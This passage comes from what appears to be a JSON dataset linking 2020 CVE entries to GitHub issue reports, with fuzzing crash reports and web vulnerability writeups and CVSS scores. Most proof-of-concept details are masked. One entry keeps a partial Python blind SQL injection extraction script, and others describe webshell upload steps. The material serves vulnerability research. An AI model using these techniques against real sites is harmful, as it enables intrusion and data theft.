  54046. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/235",
  54047. "Repo_new": "strukturag/libde265",
  54048. "Issue_Created_At": "2019-12-24T11:18:40Z",
  54049. "description": "heap overflow in de NUMBERTAG image::available_zscan when decoding file. heap overflow in de NUMBERTAG image::available_zscan when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  54050. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54051. "severity": "MEDIUM",
  54052. "baseScore": 6.5,
  54053. "impactScore": 3.6,
  54054. "exploitabilityScore": 2.8
  54055. },
  54056. {
  54057. "CVE_ID": "CVE-2020-21600",
  54058. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/243",
  54059. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/243",
  54060. "Repo_new": "strukturag/libde265",
  54061. "Issue_Created_At": "2019-12-24T11:35:38Z",
  54062. "description": "heap buffer overflow in APITAG when decoding file. heap buffer overflow in APITAG when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  54063. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54064. "severity": "MEDIUM",
  54065. "baseScore": 6.5,
  54066. "impactScore": 3.6,
  54067. "exploitabilityScore": 2.8
  54068. },
  54069. {
  54070. "CVE_ID": "CVE-2020-21601",
  54071. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/241",
  54072. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/241",
  54073. "Repo_new": "strukturag/libde265",
  54074. "Issue_Created_At": "2019-12-24T11:32:05Z",
  54075. "description": "stack buffer overflow in put_qpel_fallback when decoding file. stack buffer overflow in put_qpel_fallback when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  54076. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54077. "severity": "MEDIUM",
  54078. "baseScore": 6.5,
  54079. "impactScore": 3.6,
  54080. "exploitabilityScore": 2.8
  54081. },
  54082. {
  54083. "CVE_ID": "CVE-2020-21602",
  54084. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/242",
  54085. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/242",
  54086. "Repo_new": "strukturag/libde265",
  54087. "Issue_Created_At": "2019-12-24T11:33:52Z",
  54088. "description": "heap buffer overflow in APITAG when decoding file. heap buffer overflow in APITAG when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  54089. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54090. "severity": "MEDIUM",
  54091. "baseScore": 6.5,
  54092. "impactScore": 3.6,
  54093. "exploitabilityScore": 2.8
  54094. },
  54095. {
  54096. "CVE_ID": "CVE-2020-21603",
  54097. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/240",
  54098. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/240",
  54099. "Repo_new": "strukturag/libde265",
  54100. "Issue_Created_At": "2019-12-24T11:29:40Z",
  54101. "description": "heap buffer overflow in put_qpel NUMBERTAG fallback NUMBERTAG when decoding file. heap buffer overflow in put_qpel NUMBERTAG fallback NUMBERTAG when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  54102. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54103. "severity": "MEDIUM",
  54104. "baseScore": 6.5,
  54105. "impactScore": 3.6,
  54106. "exploitabilityScore": 2.8
  54107. },
  54108. {
  54109. "CVE_ID": "CVE-2020-21604",
  54110. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/231",
  54111. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/231",
  54112. "Repo_new": "strukturag/libde265",
  54113. "Issue_Created_At": "2019-12-24T03:25:24Z",
  54114. "description": "heap buffer overflow in decode file. heap buffer overflow in decode file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  54115. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54116. "severity": "MEDIUM",
  54117. "baseScore": 6.5,
  54118. "impactScore": 3.6,
  54119. "exploitabilityScore": 2.8
  54120. },
  54121. {
  54122. "CVE_ID": "CVE-2020-21605",
  54123. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/234",
  54124. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/234",
  54125. "Repo_new": "strukturag/libde265",
  54126. "Issue_Created_At": "2019-12-24T11:14:43Z",
  54127. "description": "segmentation fault in apply_sao_internal when decoding file. segmentation fault in apply_sao_internal when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  54128. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54129. "severity": "MEDIUM",
  54130. "baseScore": 6.5,
  54131. "impactScore": 3.6,
  54132. "exploitabilityScore": 2.8
  54133. },
  54134. {
  54135. "CVE_ID": "CVE-2020-21606",
  54136. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/232",
  54137. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/232",
  54138. "Repo_new": "strukturag/libde265",
  54139. "Issue_Created_At": "2019-12-24T08:22:59Z",
  54140. "description": "heap buffer overflow in put_epel NUMBERTAG fallback when decoding file. heap buffer overflow in put_epel NUMBERTAG fallback when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  54141. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54142. "severity": "MEDIUM",
  54143. "baseScore": 6.5,
  54144. "impactScore": 3.6,
  54145. "exploitabilityScore": 2.8
  54146. },
  54147. {
  54148. "CVE_ID": "CVE-2020-21648",
  54149. "Issue_Url_old": "https://github.com/shadoweb/wdja/issues/9",
  54150. "Issue_Url_new": "https://github.com/shadoweb/wdja/issues/9",
  54151. "Repo_new": "shadoweb/wdja",
  54152. "Issue_Created_At": "2019-12-26T15:55:23Z",
  54153. "description": "Arbitrary file deletion vulnerability. Vulnerable file: PATHTAG FILETAG. The file parameter is accepted without any filtering, so an attacker can delete arbitrary files by changing the value of file. PATHTAG FILETAG",
  54154. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  54155. "severity": "CRITICAL",
  54156. "baseScore": 9.1,
  54157. "impactScore": 5.2,
  54158. "exploitabilityScore": 3.9
  54159. },
  54160. {
  54161. "CVE_ID": "CVE-2020-21649",
  54162. "Issue_Url_old": "https://github.com/lolipop1234/XXD/issues/4",
  54163. "Issue_Url_new": "https://github.com/lolipop1234/xxd/issues/4",
  54164. "Repo_new": "lolipop1234/xxd",
  54165. "Issue_Created_At": "2019-12-27T02:50:43Z",
  54166. "description": "SSRF of Myucms NUMBERTAG PATHTAG APITAG method.",
  54167. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  54168. "severity": "HIGH",
  54169. "baseScore": 8.1,
  54170. "impactScore": 5.2,
  54171. "exploitabilityScore": 2.8
  54172. },
  54173. {
  54174. "CVE_ID": "CVE-2020-21650",
  54175. "Issue_Url_old": "https://github.com/lolipop1234/XXD/issues/6",
  54176. "Issue_Url_new": "https://github.com/lolipop1234/xxd/issues/6",
  54177. "Repo_new": "lolipop1234/xxd",
  54178. "Issue_Created_At": "2019-12-27T02:56:43Z",
  54179. "description": "Arbitrary command execution of Myucms NUMBERTAG FILETAG APITAG method.",
  54180. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  54181. "severity": "HIGH",
  54182. "baseScore": 8.8,
  54183. "impactScore": 5.9,
  54184. "exploitabilityScore": 2.8
  54185. },
  54186. {
  54187. "CVE_ID": "CVE-2020-21651",
  54188. "Issue_Url_old": "https://github.com/lolipop1234/XXD/issues/3",
  54189. "Issue_Url_new": "https://github.com/lolipop1234/xxd/issues/3",
  54190. "Repo_new": "lolipop1234/xxd",
  54191. "Issue_Created_At": "2019-12-27T02:42:28Z",
  54192. "description": "Arbitrary command execution of Myucms NUMBERTAG FILETAG APITAG method. Vulnerability location code PATHTAG FILETAG",
  54193. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54194. "severity": "CRITICAL",
  54195. "baseScore": 9.8,
  54196. "impactScore": 5.9,
  54197. "exploitabilityScore": 3.9
  54198. },
  54199. {
  54200. "CVE_ID": "CVE-2020-21652",
  54201. "Issue_Url_old": "https://github.com/lolipop1234/XXD/issues/7",
  54202. "Issue_Url_new": "https://github.com/lolipop1234/xxd/issues/7",
  54203. "Repo_new": "lolipop1234/xxd",
  54204. "Issue_Created_At": "2019-12-27T02:57:04Z",
  54205. "description": "Arbitrary command execution of Myucms NUMBERTAG FILETAG APITAG method.",
  54206. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54207. "severity": "CRITICAL",
  54208. "baseScore": 9.8,
  54209. "impactScore": 5.9,
  54210. "exploitabilityScore": 3.9
  54211. },
  54212. {
  54213. "CVE_ID": "CVE-2020-21653",
  54214. "Issue_Url_old": "https://github.com/lolipop1234/XXD/issues/5",
  54215. "Issue_Url_new": "https://github.com/lolipop1234/xxd/issues/5",
  54216. "Repo_new": "lolipop1234/xxd",
  54217. "Issue_Created_At": "2019-12-27T02:51:36Z",
  54218. "description": "SSRF of Myucms NUMBERTAG PATHTAG APITAG method.",
  54219. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  54220. "severity": "CRITICAL",
  54221. "baseScore": 9.1,
  54222. "impactScore": 5.2,
  54223. "exploitabilityScore": 3.9
  54224. },
  54225. {
  54226. "CVE_ID": "CVE-2020-21654",
  54227. "Issue_Url_old": "https://github.com/emlog/emlog/issues/55",
  54228. "Issue_Url_new": "https://github.com/emlog/emlog/issues/55",
  54229. "Repo_new": "emlog/emlog",
  54230. "Issue_Created_At": "2019-12-30T07:23:54Z",
  54231. "description": "emlog NUMBERTAG zip template getshell vulnerability. Unlike the plugin case, this is the same function but a different includer. The vulnerability was found in FILETAG line NUMBERTAG: upload a zip file containing a webshell on this page. FILETAG Because of the limit in PATHTAG line NUMBERTAG FILETAG we need to create a directory named FILETAG and place a webshell named FILETAG in it, like this: FILETAG Upload it and get a shell: PATHTAG (); FILETAG",
  54232. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  54233. "severity": "HIGH",
  54234. "baseScore": 7.2,
  54235. "impactScore": 5.9,
  54236. "exploitabilityScore": 1.2
  54237. },
  54238. {
  54239. "CVE_ID": "CVE-2020-21656",
  54240. "Issue_Url_old": "https://github.com/gosea/xyhcms3/issues/2",
  54241. "Issue_Url_new": "https://github.com/gosea/xyhcms3/issues/2",
  54242. "Repo_new": "gosea/xyhcms3",
  54243. "Issue_Created_At": "2019-12-31T08:29:04Z",
  54244. "description": "There is a stored XSS in PATHTAG FILETAG FILETAG FILETAG",
  54245. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  54246. "severity": "MEDIUM",
  54247. "baseScore": 5.4,
  54248. "impactScore": 2.7,
  54249. "exploitabilityScore": 2.3
  54250. },
  54251. {
  54252. "CVE_ID": "CVE-2020-21658",
  54253. "Issue_Url_old": "https://github.com/shadoweb/wdja/issues/10",
  54254. "Issue_Url_new": "https://github.com/shadoweb/wdja/issues/10",
  54255. "Repo_new": "shadoweb/wdja",
  54256. "Issue_Created_At": "2020-01-01T16:43:03Z",
  54257. "description": "wdja has a CSRF vulnerability. A CSRF vulnerability is often used in combination with phishing: use the CSRF PoC to build a phishing website. If the victim visits the phishing page while logged in to their wdja site, the CSRF vulnerability is exploited. PoC: APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Verification: log in, APITAG on the CSRF PoC, then a new webmaster account will have been added. FILETAG FILETAG FILETAG wdja APITAG",
  54258. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  54259. "severity": "MEDIUM",
  54260. "baseScore": 6.5,
  54261. "impactScore": 3.6,
  54262. "exploitabilityScore": 2.8
  54263. },
  54264. {
  54265. "CVE_ID": "CVE-2020-21667",
  54266. "Issue_Url_old": "https://github.com/che-my/fastadmin-tp6/issues/2",
  54267. "Issue_Url_new": "https://github.com/che-my/fastadmin-tp6/issues/2",
  54268. "Repo_new": "che-my/fastadmin-tp6",
  54269. "Issue_Created_At": "2019-12-30T02:57:21Z",
  54270. "description": "Fastadmin tp6 SQL injection. When a user with administrator rights is logged in to the backend, SQL injection can be performed during sorting by constructing malicious data. In file APITAG line NUMBERTAG the table parameter passed in is not filtered, so a malicious value can be passed for SQL injection. POC: CODETAG Example: FILETAG",
  54271. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  54272. "severity": "HIGH",
  54273. "baseScore": 7.2,
  54274. "impactScore": 5.9,
  54275. "exploitabilityScore": 1.2
  54276. },
  54277. {
  54278. "CVE_ID": "CVE-2020-21674",
  54279. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/1298",
  54280. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/1298",
  54281. "Repo_new": "libarchive/libarchive",
  54282. "Issue_Created_At": "2019-12-28T18:16:57Z",
  54283. "description": "Heap buffer overflow in APITAG (archive_string.c). bsdtar: An error in APITAG (archive_string.c) triggers an out-of-bounds write in heap memory that results in a crash, via a specially crafted archive file. This bug was found using our custom fuzzer. Basic Information: versions of libarchive NUMBERTAG dev How you obtained it: built from source libarchive NUMBERTAG dev ( URLTAG Tested OS: Linu NUMBERTAG generic NUMBERTAG Tested compiler version : gcc version NUMBERTAG What other files were involved? To trigger the bug, use the crash file (unzip crash APITAG FILETAG =============== Compile with AddressSanitizer (fsanitize=address) Command to reproduce the bug: $ ./bsdtar t f crash file Output (partial): ERRORTAG Crash analysis : In APITAG (archive_string.c), upon execution of the crashing input (crash file): CODETAG",
  54284. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54285. "severity": "MEDIUM",
  54286. "baseScore": 6.5,
  54287. "impactScore": 3.6,
  54288. "exploitabilityScore": 2.8
  54289. },
  54290. {
  54291. "CVE_ID": "CVE-2020-21677",
  54292. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/123",
  54293. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/123",
  54294. "Repo_new": "saitoha/libsixel",
  54295. "Issue_Created_At": "2019-12-24T03:33:01Z",
  54296. "description": "heap buffer overflow in APITAG at APITAG version : img2sixel NUMBERTAG OS : Ubuntu NUMBERTAG configured with: libcurl: yes libpng: yes libjpeg: yes gdk pixbuf2: no GD: no There is a heap buffer overflow in APITAG at APITAG Run the following command to reproduce it. APITAG poc URLTAG ASAN LOG ERRORTAG",
  54297. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54298. "severity": "MEDIUM",
  54299. "baseScore": 6.5,
  54300. "impactScore": 3.6,
  54301. "exploitabilityScore": 2.8
  54302. },
  54303. {
  54304. "CVE_ID": "CVE-2020-21725",
  54305. "Issue_Url_old": "https://github.com/CoColizdf/CVE/issues/1",
  54306. "Issue_Url_new": "https://github.com/cocococococoli/cve/issues/1",
  54307. "Repo_new": "cocococococoli/cve",
  54308. "Issue_Created_At": "2019-12-31T02:30:25Z",
  54309. "description": "APITAG NUMBERTAG has an unauthenticated time-based (sleep) blind SQL injection vulnerability in the pid parameter. APITAG NUMBERTAG has an unauthenticated time-based blind SQL injection vulnerability in the pid parameter. An unauthenticated time-based blind SQL injection vulnerability was discovered in APITAG CMS NUMBERTAG in the pid parameter. This CMS official website > FILETAG FILETAG Vulnerable URL > FILETAG PoC ERRORTAG FILETAG FILETAG Vulnerable file PATHTAG FILETAG FILETAG FILETAG from APITAG APITAG Tech)",
  54310. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54311. "severity": "CRITICAL",
  54312. "baseScore": 9.8,
  54313. "impactScore": 5.9,
  54314. "exploitabilityScore": 3.9
  54315. },
  54316. {
  54317. "CVE_ID": "CVE-2020-21726",
  54318. "Issue_Url_old": "https://github.com/CoColizdf/CVE/issues/2",
  54319. "Issue_Url_new": "https://github.com/cocococococoli/cve/issues/2",
  54320. "Repo_new": "cocococococoli/cve",
  54321. "Issue_Created_At": "2019-12-31T02:34:51Z",
  54322. "description": "An unauthenticated time-based (sleep) blind SQL injection vulnerability was discovered in APITAG CMS NUMBERTAG in the cid parameter. APITAG NUMBERTAG has an unauthenticated time-based blind SQL injection vulnerability in the cid parameter. An unauthenticated time-based blind SQL injection vulnerability was discovered in APITAG CMS NUMBERTAG in the cid parameter. This CMS official website > FILETAG FILETAG Vulnerable URL > FILETAG PoC ERRORTAG FILETAG FILETAG Vulnerable file > PATHTAG FILETAG PATHTAG FILETAG FILETAG from APITAG APITAG Tech)",
  54323. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54324. "severity": "CRITICAL",
  54325. "baseScore": 9.8,
  54326. "impactScore": 5.9,
  54327. "exploitabilityScore": 3.9
  54328. },
  54329. {
  54330. "CVE_ID": "CVE-2020-21729",
  54331. "Issue_Url_old": "https://github.com/CoColizdf/CVE/issues/3",
  54332. "Issue_Url_new": "https://github.com/cocococococoli/cve/issues/3",
  54333. "Repo_new": "cocococococoli/cve",
  54334. "Issue_Created_At": "2020-01-03T10:30:26Z",
  54335. "description": "JEECMS NUMBERTAG has a stored XSS vulnerability. This is the CMS official website > FILETAG A stored XSS vulnerability was discovered in JEECMS NUMBERTAG FILETAG The PoC payload is APITAG FILETAG After submitting, refresh the page to trigger the XSS. FILETAG APITAG FILETAG FILETAG Vulnerable file PATHTAG CODETAG PATHTAG FILETAG PATHTAG FILETAG",
  54336. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  54337. "severity": "MEDIUM",
  54338. "baseScore": 5.4,
  54339. "impactScore": 2.7,
  54340. "exploitabilityScore": 2.3
  54341. },
  54342. {
  54343. "CVE_ID": "CVE-2020-21784",
  54344. "Issue_Url_old": "https://github.com/slackero/phpwcms/issues/286",
  54345. "Issue_Url_new": "https://github.com/slackero/phpwcms/issues/286",
  54346. "Repo_new": "slackero/phpwcms",
  54347. "Issue_Created_At": "2020-01-16T07:16:02Z",
  54348. "description": "Code injection vulnerability leading to getshell. Code audit: FILETAG code Open the secure boot file APITAG; the file path is APITAG APITAG It includes APITAG on line NUMBERTAG FILETAG FILETAG code Open file APITAG and you can see line NUMBERTAG FILETAG FILETAG code Track the function APITAG in APITAG on line NUMBERTAG FILETAG and on line NUMBERTAG it calls function APITAG to write the config file on line NUMBERTAG FILETAG FILETAG Testing: to get a shell through this interface, you can input some information like this. FILETAG payload APITAG After completing it, click Submit. It will show some error information, but you can then access an address like this and see that the injected code runs. FILETAG Solution: filter sensitive characters; better, escape or serialize the values before writing them into the config file rather than relying on a character blacklist alone.",
  54349. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54350. "severity": "CRITICAL",
  54351. "baseScore": 9.8,
  54352. "impactScore": 5.9,
  54353. "exploitabilityScore": 3.9
  54354. },
  54355. {
  54356. "CVE_ID": "CVE-2020-21806",
  54357. "Issue_Url_old": "https://github.com/ectouch/ectouch/issues/5",
  54358. "Issue_Url_new": "https://github.com/ectouch/ectouch/issues/5",
  54359. "Repo_new": "ectouch/ectouch",
  54360. "Issue_Created_At": "2020-01-04T06:27:04Z",
  54361. "description": "SQL Injection vulnerability. Order\uff1a EMAILTAG .cn poc: import requests import re,string import APITAG def APITAG param={} url=\" URLTAG \" payload_len NUMBERTAG or APITAG a\"' APITAG i NUMBERTAG while i NUMBERTAG payload_len_i = APITAG APITAG goods_i = APITAG param['goods'] = goods_i print(param) r = APITAG if \"cart_number\" in r.text: print(\"len:\",i) return i i NUMBERTAG def get_database(len): param={} database_name=\"\" url=\" URLTAG \" payload_database NUMBERTAG or APITAG a\"' APITAG chr_str = APITAG + APITAG + APITAG for i in range(len): for j in chr_str: APITAG APITAG goods_i = APITAG param['goods'] = goods_i r = APITAG if \"cart_number\" in r.text: database_name+=j APITAG APITAG get_database(len)",
  54362. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54363. "severity": "CRITICAL",
  54364. "baseScore": 9.8,
  54365. "impactScore": 5.9,
  54366. "exploitabilityScore": 3.9
  54367. },
  54368. {
  54369. "CVE_ID": "CVE-2020-21813",
  54370. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/182",
  54371. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/182",
  54372. "Repo_new": "libredwg/libredwg",
  54373. "Issue_Created_At": "2020-01-10T06:17:10Z",
  54374. "description": "Several bugs found by fuzzing. Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2SVG APITAG NUMBERTAG NULL pointer dereference in htmlescape PATHTAG POC: URLTAG ASAN says: ERRORTAG",
  54375. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  54376. "severity": "HIGH",
  54377. "baseScore": 7.8,
  54378. "impactScore": 5.9,
  54379. "exploitabilityScore": 1.8
  54380. },
  54381. {
  54382. "CVE_ID": "CVE-2020-21827",
  54383. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/183",
  54384. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/183",
  54385. "Repo_new": "libredwg/libredwg",
  54386. "Issue_Created_At": "2020-01-13T02:49:42Z",
  54387. "description": "Heap over flow. I found a bug in dwg2dxf. POC: URLTAG ERRORTAG",
  54388. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  54389. "severity": "HIGH",
  54390. "baseScore": 7.8,
  54391. "impactScore": 5.9,
  54392. "exploitabilityScore": 1.8
  54393. },
  54394. {
  54395. "CVE_ID": "CVE-2020-21830",
  54396. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/188",
  54397. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/188",
  54398. "Repo_new": "libredwg/libredwg",
  54399. "Issue_Created_At": "2020-01-15T04:37:59Z",
  54400. "description": "Several bugs found by fuzzing. Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwgbmp APITAG NUMBERTAG NULL pointer dereference in read NUMBERTAG compressed_section PATHTAG POC: URLTAG ERRORTAG",
  54401. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  54402. "severity": "HIGH",
  54403. "baseScore": 8.8,
  54404. "impactScore": 5.9,
  54405. "exploitabilityScore": 2.8
  54406. },
  54407. {
  54408. "CVE_ID": "CVE-2020-21854",
  54409. "Issue_Url_old": "https://github.com/TideSec/WDScanner/issues/41",
  54410. "Issue_Url_new": "https://github.com/tidesec/wdscanner/issues/41",
  54411. "Repo_new": "tidesec/wdscanner",
  54412. "Issue_Created_At": "2020-01-08T06:10:40Z",
  54413. "description": "XSS vulnerability in system management page. Hello, I found XSS vulnerability in the system management page\u3002 APITAG This is the payload When I tested: FILETAG Param:c=new&m=set APITAG APITAG group NUMBERTAG mail= APITAG APITAG NUMBERTAG APITAG APITAG",
  54414. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  54415. "severity": "MEDIUM",
  54416. "baseScore": 6.1,
  54417. "impactScore": 2.7,
  54418. "exploitabilityScore": 2.8
  54419. },
  54420. {
  54421. "CVE_ID": "CVE-2020-21929",
  54422. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/8",
  54423. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/8",
  54424. "Repo_new": "weng-xianhu/eyoucms",
  54425. "Issue_Created_At": "2020-01-14T08:25:16Z",
  54426. "description": "Storage XSS vulnerabilities exist in \"web_copyright \" field in eyoucms NUMBERTAG Storage XSS refers to an application that directly stores malicious code submitted by the attacker to the background. When the display data page is accessed, the malicious script executes malicious code in the browser due to html injection and the attacker controls the browser. After the administrator logged in, open the following one page url: FILETAG poc: in web_copyright FILETAG FILETAG",
  54427. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  54428. "severity": "MEDIUM",
  54429. "baseScore": 5.4,
  54430. "impactScore": 2.7,
  54431. "exploitabilityScore": 2.3
  54432. },
  54433. {
  54434. "CVE_ID": "CVE-2020-21930",
  54435. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/9",
  54436. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/9",
  54437. "Repo_new": "weng-xianhu/eyoucms",
  54438. "Issue_Created_At": "2020-01-14T08:33:10Z",
  54439. "description": "Storage XSS vulnerabilities exist in \"web_attr NUMBERTAG field in eyoucms NUMBERTAG Storage XSS refers to an application that directly stores malicious code submitted by the attacker to the background. When the display data page is accessed, the malicious script executes malicious code in the browser due to html injection and the attacker controls the browser. After the administrator logged in, open the following one page url: FILETAG poc: in web_attr NUMBERTAG FILETAG FILETAG",
